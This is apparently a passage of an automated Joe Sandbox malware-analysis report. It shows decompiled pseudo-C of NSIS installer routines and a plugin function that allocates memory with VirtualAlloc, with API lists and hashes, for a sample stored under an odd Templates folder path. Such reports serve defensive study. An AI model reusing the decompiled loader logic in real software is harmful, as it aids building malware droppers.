                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                • Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
                                                • Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                • Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 32%
                                                			E6EB82B98(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				void* _t28;
                                                				void* _t29;
                                                				void* _t33;
                                                				void* _t37;
                                                				void* _t40;
                                                				void* _t45;
                                                				void* _t49;
                                                				signed int _t56;
                                                				void* _t61;
                                                				void* _t70;
                                                				intOrPtr _t72;
                                                				signed int _t77;
                                                				intOrPtr _t79;
                                                				intOrPtr _t80;
                                                				void* _t81;
                                                				void* _t87;
                                                				void* _t88;
                                                				void* _t89;
                                                				void* _t90;
                                                				intOrPtr _t93;
                                                				intOrPtr _t94;
                                                
                                                				if( *0x6eb85050 != 0 && E6EB82ADB(_a4) == 0) {
                                                					 *0x6eb85054 = _t93;
                                                					if( *0x6eb8504c != 0) {
                                                						_t93 =  *0x6eb8504c;
                                                					} else {
                                                						E6EB830C0(E6EB82AD5(), __ecx);
                                                						 *0x6eb8504c = _t93;
                                                					}
                                                				}
                                                				_t28 = E6EB82B09(_a4);
                                                				_t94 = _t93 + 4;
                                                				if(_t28 <= 0) {
                                                					L9:
                                                					_t29 = E6EB82AFD();
                                                					_t72 = _a4;
                                                					_t79 =  *0x6eb85058;
                                                					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                					 *0x6eb85058 = _t72;
                                                					E6EB82AF7();
                                                					_t33 = VirtualAlloc(??, ??, ??, ??); // executed
                                                					 *0x6eb85034 = _t33;
                                                					 *0x6eb85038 = _t79;
                                                					if( *0x6eb85050 != 0 && E6EB82ADB( *0x6eb85058) == 0) {
                                                						 *0x6eb8504c = _t94;
                                                						_t94 =  *0x6eb85054;
                                                					}
                                                					_t80 =  *0x6eb85058;
                                                					_a4 = _t80;
                                                					 *0x6eb85058 =  *((intOrPtr*)(E6EB82AFD() + _t80));
                                                					_t37 = E6EB82AE9(_t80);
                                                					_pop(_t81);
                                                					if(_t37 != 0) {
                                                						_t40 = E6EB82B09(_t81);
                                                						if(_t40 > 0) {
                                                							_push(_t40);
                                                							_push(E6EB82B14() + _a4 + _v8);
                                                							_push(E6EB82B1E());
                                                							if( *0x6eb85050 <= 0 || E6EB82ADB(_a4) != 0) {
                                                								_pop(_t88);
                                                								_pop(_t45);
                                                								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                								if(__eflags == 0) {
                                                								}
                                                								asm("loop 0xfffffff5");
                                                							} else {
                                                								_pop(_t89);
                                                								_pop(_t49);
                                                								 *0x6eb8504c =  *0x6eb8504c +  *(_t89 + _t49) * 4;
                                                								asm("loop 0xffffffeb");
                                                							}
                                                						}
                                                					}
                                                					_t107 =  *0x6eb85058;
                                                					if( *0x6eb85058 == 0) {
                                                						 *0x6eb8504c = 0;
                                                					}
                                                					E6EB82B42(_t107, _a4,  *0x6eb85034,  *0x6eb85038);
                                                					return _a4;
                                                				}
                                                				_push(E6EB82B14() + _a4);
                                                				_t56 = E6EB82B1A();
                                                				_v8 = _t56;
                                                				_t77 = _t28;
                                                				_push(_t68 + _t56 * _t77);
                                                				_t70 = E6EB82B26();
                                                				_t87 = E6EB82B22();
                                                				_t90 = E6EB82B1E();
                                                				_t61 = _t77;
                                                				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                					_push( *((intOrPtr*)(_t70 + _t61)));
                                                				}
                                                				_push( *((intOrPtr*)(_t87 + _t61)));
                                                				asm("loop 0xfffffff1");
                                                				goto L9;
                                                			}

























                                                0x6eb82ba8
                                                0x6eb82bb9
                                                0x6eb82bc6
                                                0x6eb82bda
                                                0x6eb82bc8
                                                0x6eb82bcd
                                                0x6eb82bd2
                                                0x6eb82bd2
                                                0x6eb82bc6
                                                0x6eb82be3
                                                0x6eb82be8
                                                0x6eb82bee
                                                0x6eb82c32
                                                0x6eb82c32
                                                0x6eb82c37
                                                0x6eb82c3c
                                                0x6eb82c42
                                                0x6eb82c44
                                                0x6eb82c4a
                                                0x6eb82c57
                                                0x6eb82c59
                                                0x6eb82c5e
                                                0x6eb82c6b
                                                0x6eb82c7e
                                                0x6eb82c84
                                                0x6eb82c8a
                                                0x6eb82c8b
                                                0x6eb82c91
                                                0x6eb82c9d
                                                0x6eb82ca3
                                                0x6eb82cab
                                                0x6eb82cac
                                                0x6eb82caf
                                                0x6eb82cba
                                                0x6eb82cbc
                                                0x6eb82cc8
                                                0x6eb82cce
                                                0x6eb82cd6
                                                0x6eb82d02
                                                0x6eb82d03
                                                0x6eb82d05
                                                0x6eb82d09
                                                0x6eb82d09
                                                0x6eb82d10
                                                0x6eb82ce6
                                                0x6eb82ce6
                                                0x6eb82ce7
                                                0x6eb82cf5
                                                0x6eb82cfe
                                                0x6eb82cfe
                                                0x6eb82cd6
                                                0x6eb82cba
                                                0x6eb82d12
                                                0x6eb82d19
                                                0x6eb82d1b
                                                0x6eb82d1b
                                                0x6eb82d34
                                                0x6eb82d42
                                                0x6eb82d42
                                                0x6eb82bf9
                                                0x6eb82bfa
                                                0x6eb82bff
                                                0x6eb82c03
                                                0x6eb82c08
                                                0x6eb82c1c
                                                0x6eb82c1d
                                                0x6eb82c1e
                                                0x6eb82c20
                                                0x6eb82c25
                                                0x6eb82c27
                                                0x6eb82c27
                                                0x6eb82c2a
                                                0x6eb82c30
                                                0x00000000

                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000), ref: 6EB82C57
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.753716661.000000006EB81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EB80000, based on PE: true
                                                • Associated: 00000000.00000002.753709872.000000006EB80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753728079.000000006EB84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753739144.000000006EB86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eb80000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: a60a77fd971490fd387065b7d0c182abc682be14130fbcc976831a0c0f46f7f2
                                                • Instruction ID: 151d428a34461baed640065d608e1074a94e80e60d032ccb0e9af4b3f1eaafd5
                                                • Opcode Fuzzy Hash: a60a77fd971490fd387065b7d0c182abc682be14130fbcc976831a0c0f46f7f2
                                                • Instruction Fuzzy Hash: 46418E71516686EFDF149FE4D894B9F3FBCEB56318F208826E80597300D738A4819BD5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00401FA4(void* __ecx) {
                                                				void* _t9;
                                                				intOrPtr _t13;
                                                				void* _t15;
                                                				void* _t17;
                                                				void* _t20;
                                                				void* _t22;
                                                
                                                				_t17 = __ecx;
                                                				_t19 = E00402DA6(_t15);
                                                				E00405569(0xffffffeb, _t7); // executed
                                                				_t9 = E00405AEA(_t19); // executed
                                                				_t20 = _t9;
                                                				if(_t20 == _t15) {
                                                					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                				} else {
                                                					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                						_t13 = E0040697F(_t17, _t20);
                                                						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                							if(_t13 != _t15) {
                                                								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                							}
                                                						} else {
                                                							E0040644E( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                						}
                                                					}
                                                					_push(_t20);
                                                					CloseHandle();
                                                				}
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
                                                				return 0;
                                                			}









                                                0x00401fa4
                                                0x00401faa
                                                0x00401faf
                                                0x00401fb5
                                                0x00401fba
                                                0x00401fbe
                                                0x0040292e
                                                0x00401fc4
                                                0x00401fc7
                                                0x00401fca
                                                0x00401fd2
                                                0x00401fe1
                                                0x00401fe3
                                                0x00401fe3
                                                0x00401fd4
                                                0x00401fd8
                                                0x00401fd8
                                                0x00401fd2
                                                0x00401fea
                                                0x00401feb
                                                0x00401feb
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                  • Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                  • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                  • Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,004033ED), ref: 004055C4
                                                  • Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll), ref: 004055D6
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                  • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                  • Part of subcall function 00405AEA: CreateProcessW.KERNELBASE ref: 00405B13
                                                  • Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                  • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                                                  • Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32 ref: 004069B2
                                                  • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                • String ID:
                                                • API String ID: 2972824698-0
                                                • Opcode ID: f63ea1c2bff24e9e69c4bfa64d3b71e71d4d0182849d0b2c143de8970cb27b64
                                                • Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
                                                • Opcode Fuzzy Hash: f63ea1c2bff24e9e69c4bfa64d3b71e71d4d0182849d0b2c143de8970cb27b64
                                                • Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004014D7(intOrPtr __edx) {
                                                				long _t3;
                                                				void* _t7;
                                                				intOrPtr _t10;
                                                				void* _t13;
                                                
                                                				_t10 = __edx;
                                                				_t3 = E00402D84(_t7);
                                                				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                				if(_t3 <= 1) {
                                                					_t3 = 1;
                                                				}
                                                				Sleep(_t3); // executed
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t13 - 4));
                                                				return 0;
                                                			}







                                                0x004014d7
                                                0x004014d8
                                                0x004014e1
                                                0x004014e4
                                                0x004014e8
                                                0x004014e8
                                                0x004014ea
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 69496f19bc6ab9971bad014e7fdfb58ea689034bd31df4dea0a06c0f69c6c777
                                                • Instruction ID: 13549e56dd5f321cd39d4a1c5d69ee1d893e1909e6cc3dd33a15c81121e8da7c
                                                • Opcode Fuzzy Hash: 69496f19bc6ab9971bad014e7fdfb58ea689034bd31df4dea0a06c0f69c6c777
                                                • Instruction Fuzzy Hash: 7CD05E73A141018BD714EBB8BE8545E73A8EB503193208837D402E1191E67888564618
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6EB812BB() {
                                                				void* _t3;
                                                
                                                				_t3 = GlobalAlloc(0x40,  *0x6eb8506c +  *0x6eb8506c); // executed
                                                				return _t3;
                                                			}




                                                0x6eb812c5
                                                0x6eb812cb

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,6EB812DB,?,6EB8137F,00000019,6EB811CA,-000000A0), ref: 6EB812C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.753716661.000000006EB81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EB80000, based on PE: true
                                                • Associated: 00000000.00000002.753709872.000000006EB80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753728079.000000006EB84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753739144.000000006EB86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eb80000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: affd3543bcaf88e81650de79d66d9e78c14142dd42b0481cd641a6b1a29d94de
                                                • Instruction ID: 40a36b3af3a9fdd1bafcb5053098ad3447279659f7f2dba3ac390dc401655c49
                                                • Opcode Fuzzy Hash: affd3543bcaf88e81650de79d66d9e78c14142dd42b0481cd641a6b1a29d94de
                                                • Instruction Fuzzy Hash: ECB01270A00502DFEE018B64CC06F373698E713301F044000F601C2380C1204C00853A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00404954(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				long _v20;
                                                				long _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				long _v36;
                                                				char _v40;
                                                				unsigned int _v44;
                                                				signed int _v48;
                                                				WCHAR* _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				WCHAR* _v72;
                                                				void _v76;
                                                				struct HWND__* _v80;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t82;
                                                				long _t87;
                                                				short* _t89;
                                                				void* _t95;
                                                				signed int _t96;
                                                				int _t109;
                                                				signed short _t114;
                                                				signed int _t118;
                                                				struct HWND__** _t122;
                                                				intOrPtr* _t138;
                                                				WCHAR* _t146;
                                                				unsigned int _t150;
                                                				signed int _t152;
                                                				unsigned int _t156;
                                                				signed int _t158;
                                                				signed int* _t159;
                                                				signed int* _t160;
                                                				struct HWND__* _t166;
                                                				struct HWND__* _t167;
                                                				int _t169;
                                                				unsigned int _t197;
                                                
                                                				_t156 = __edx;
                                                				_t82 =  *0x4226e0; // 0x51a0ec
                                                				_v32 = _t82;
                                                				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                				if(_a8 == 0x40b) {
                                                					E00405B4B(0x3fb, _t146);
                                                					E0040678E(_t146);
                                                				}
                                                				_t167 = _a4;
                                                				if(_a8 != 0x110) {
                                                					L8:
                                                					if(_a8 != 0x111) {
                                                						L20:
                                                						if(_a8 == 0x40f) {
                                                							L22:
                                                							_v8 = _v8 & 0x00000000;
                                                							_v12 = _v12 & 0x00000000;
                                                							E00405B4B(0x3fb, _t146);
                                                							if(E00405EDE(_t186, _t146) == 0) {
                                                								_v8 = 1;
                                                							}
                                                							E00406507(0x4216d8, _t146);
                                                							_t87 = E004068D4(1);
                                                							_v16 = _t87;
                                                							if(_t87 == 0) {
                                                								L30:
                                                								E00406507(0x4216d8, _t146);
                                                								_t89 = E00405E81(0x4216d8);
                                                								_t158 = 0;
                                                								if(_t89 != 0) {
                                                									 *_t89 = 0;
                                                								}
                                                								if(GetDiskFreeSpaceW(0x4216d8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t169 = 0x400;
                                                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                									asm("cdq");
                                                									_v48 = _t109;
                                                									_v44 = _t156;
                                                									_v12 = 1;
                                                									goto L36;
                                                								}
                                                							} else {
                                                								_t159 = 0;
                                                								if(0 == 0x4216d8) {
                                                									goto L30;
                                                								} else {
                                                									goto L26;
                                                								}
                                                								while(1) {
                                                									L26:
                                                									_t114 = _v16(0x4216d8,  &_v48,  &_v28,  &_v40);
                                                									if(_t114 != 0) {
                                                										break;
                                                									}
                                                									if(_t159 != 0) {
                                                										 *_t159 =  *_t159 & _t114;
                                                									}
                                                									_t160 = E00405E22(0x4216d8);
                                                									 *_t160 =  *_t160 & 0x00000000;
                                                									_t159 = _t160;
                                                									 *_t159 = 0x5c;
                                                									if(_t159 != 0x4216d8) {
                                                										continue;
                                                									} else {
                                                										goto L30;
                                                									}
                                                								}
                                                								_t150 = _v44;
                                                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                								_v44 = _t150 >> 0xa;
                                                								_v12 = 1;
                                                								_t158 = 0;
                                                								__eflags = 0;
                                                								L35:
                                                								_t169 = 0x400;
                                                								L36:
                                                								_t95 = E00404DF1(5);
                                                								if(_v12 != _t158) {
                                                									_t197 = _v44;
                                                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                										_v8 = 2;
                                                									}
                                                								}
                                                								if( *((intOrPtr*)( *0x4291fc + 0x10)) != _t158) {
                                                									E00404DD9(0x3ff, 0xfffffffb, _t95);
                                                									if(_v12 == _t158) {
                                                										SetDlgItemTextW(_a4, _t169, 0x4216c8);
                                                									} else {
                                                										E00404D10(_t169, 0xfffffffc, _v48, _v44);
                                                									}
                                                								}
                                                								_t96 = _v8;
                                                								 *0x42a2c4 = _t96;
                                                								if(_t96 == _t158) {
                                                									_v8 = E0040140B(7);
                                                								}
                                                								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                									_v8 = _t158;
                                                								}
                                                								E00404485(0 | _v8 == _t158);
                                                								if(_v8 == _t158 &&  *0x4236f8 == _t158) {
                                                									E004048AD();
                                                								}
                                                								 *0x4236f8 = _t158;
                                                								goto L53;
                                                							}
                                                						}
                                                						_t186 = _a8 - 0x405;
                                                						if(_a8 != 0x405) {
                                                							goto L53;
                                                						}
                                                						goto L22;
                                                					}
                                                					_t118 = _a12 & 0x0000ffff;
                                                					if(_t118 != 0x3fb) {
                                                						L12:
                                                						if(_t118 == 0x3e9) {
                                                							_t152 = 7;
                                                							memset( &_v76, 0, _t152 << 2);
                                                							_v80 = _t167;
                                                							_v72 = 0x423708;
                                                							_v60 = E00404CAA;
                                                							_v56 = _t146;
                                                							_v68 = E00406544(_t146, 0x423708, _t167, 0x421ee0, _v12);
                                                							_t122 =  &_v80;
                                                							_v64 = 0x41;
                                                							__imp__SHBrowseForFolderW(_t122);
                                                							if(_t122 == 0) {
                                                								_a8 = 0x40f;
                                                							} else {
                                                								__imp__CoTaskMemFree(_t122);
                                                								E00405DD6(_t146);
                                                								_t125 =  *((intOrPtr*)( *0x42a230 + 0x11c));
                                                								if( *((intOrPtr*)( *0x42a230 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially") {
                                                									E00406544(_t146, 0x423708, _t167, 0, _t125);
                                                									if(lstrcmpiW(0x4281c0, 0x423708) != 0) {
                                                										lstrcatW(_t146, 0x4281c0);
                                                									}
                                                								}
                                                								 *0x4236f8 =  *0x4236f8 + 1;
                                                								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                					if(_a12 >> 0x10 != 0x300) {
                                                						goto L53;
                                                					}
                                                					_a8 = 0x40f;
                                                					goto L12;
                                                				} else {
                                                					_t166 = GetDlgItem(_t167, 0x3fb);
                                                					if(E00405E4D(_t146) != 0 && E00405E81(_t146) == 0) {
                                                						E00405DD6(_t146);
                                                					}
                                                					 *0x4291f8 = _t167;
                                                					SetWindowTextW(_t166, _t146);
                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                					_push(1);
                                                					E00404463(_t167);
                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                					_push(0x14);
                                                					E00404463(_t167);
                                                					E00404498(_t166);
                                                					_t138 = E004068D4(8);
                                                					if(_t138 == 0) {
                                                						L53:
                                                						return E004044CA(_a8, _a12, _a16);
                                                					} else {
                                                						 *_t138(_t166, 1);
                                                						goto L8;
                                                					}
                                                				}
                                                			}













































                                                0x00404954
                                                0x0040495a
                                                0x00404960
                                                0x0040496d
                                                0x0040497b
                                                0x0040497e
                                                0x00404986
                                                0x0040498c
                                                0x0040498c
                                                0x00404998
                                                0x0040499b
                                                0x00404a09
                                                0x00404a10
                                                0x00404ae7
                                                0x00404aee
                                                0x00404afd
                                                0x00404afd
                                                0x00404b01
                                                0x00404b0b
                                                0x00404b18
                                                0x00404b1a
                                                0x00404b1a
                                                0x00404b28
                                                0x00404b2f
                                                0x00404b36
                                                0x00404b39
                                                0x00404b75
                                                0x00404b77
                                                0x00404b7d
                                                0x00404b82
                                                0x00404b86
                                                0x00404b88
                                                0x00404b88
                                                0x00404ba4
                                                0x00000000
                                                0x00404ba6
                                                0x00404ba9
                                                0x00404bb7
                                                0x00404bbd
                                                0x00404bbe
                                                0x00404bc1
                                                0x00404bc4
                                                0x00000000
                                                0x00404bc4
                                                0x00404b3b
                                                0x00404b3d
                                                0x00404b41
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b43
                                                0x00404b43
                                                0x00404b50
                                                0x00404b55
                                                0x00000000
                                                0x00000000
                                                0x00404b59
                                                0x00404b5b
                                                0x00404b5b
                                                0x00404b64
                                                0x00404b66
                                                0x00404b6b
                                                0x00404b6e
                                                0x00404b73
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b73
                                                0x00404bd0
                                                0x00404bda
                                                0x00404bdd
                                                0x00404be0
                                                0x00404be7
                                                0x00404be7
                                                0x00404be9
                                                0x00404be9
                                                0x00404bee
                                                0x00404bf0
                                                0x00404bf8
                                                0x00404bff
                                                0x00404c01
                                                0x00404c0c
                                                0x00404c0c
                                                0x00404c01
                                                0x00404c1c
                                                0x00404c26
                                                0x00404c2e
                                                0x00404c49
                                                0x00404c30
                                                0x00404c39
                                                0x00404c39
                                                0x00404c2e
                                                0x00404c4e
                                                0x00404c53
                                                0x00404c58
                                                0x00404c61
                                                0x00404c61
                                                0x00404c6a
                                                0x00404c6c
                                                0x00404c6c
                                                0x00404c78
                                                0x00404c80
                                                0x00404c8a
                                                0x00404c8a
                                                0x00404c8f
                                                0x00000000
                                                0x00404c8f
                                                0x00404b39
                                                0x00404af0
                                                0x00404af7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404af7
                                                0x00404a16
                                                0x00404a1f
                                                0x00404a39
                                                0x00404a3e
                                                0x00404a48
                                                0x00404a4f
                                                0x00404a5b
                                                0x00404a5e
                                                0x00404a61
                                                0x00404a68
                                                0x00404a70
                                                0x00404a73
                                                0x00404a77
                                                0x00404a7e
                                                0x00404a86
                                                0x00404ae0
                                                0x00404a88
                                                0x00404a89
                                                0x00404a90
                                                0x00404a9a
                                                0x00404aa2
                                                0x00404aaf
                                                0x00404ac3
                                                0x00404ac7
                                                0x00404ac7
                                                0x00404ac3
                                                0x00404acc
                                                0x00404ad9
                                                0x00404ad9
                                                0x00404a86
                                                0x00000000
                                                0x00404a3e
                                                0x00404a2c
                                                0x00000000
                                                0x00000000
                                                0x00404a32
                                                0x00000000
                                                0x0040499d
                                                0x004049aa
                                                0x004049b3
                                                0x004049c0
                                                0x004049c0
                                                0x004049c7
                                                0x004049cd
                                                0x004049d6
                                                0x004049d9
                                                0x004049dc
                                                0x004049e4
                                                0x004049e7
                                                0x004049ea
                                                0x004049f0
                                                0x004049f7
                                                0x004049fe
                                                0x00404c95
                                                0x00404ca7
                                                0x00404a04
                                                0x00404a07
                                                0x00000000
                                                0x00404a07
                                                0x004049fe

                                                APIs
                                                • GetDlgItem.USER32 ref: 004049A3
                                                • SetWindowTextW.USER32(00000000,?), ref: 004049CD
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404A89
                                                • lstrcmpiW.KERNEL32(Call,00423708,00000000,?,?), ref: 00404ABB
                                                • lstrcatW.KERNEL32(?,Call), ref: 00404AC7
                                                • SetDlgItemTextW.USER32 ref: 00404AD9
                                                  • Part of subcall function 00405B4B: GetDlgItemTextW.USER32 ref: 00405B5E
                                                  • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                                  • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                  • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                  • Part of subcall function 0040678E: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
                                                  • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                  • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
                                                  • Part of subcall function 00404D10: SetDlgItemTextW.USER32 ref: 00404DCD
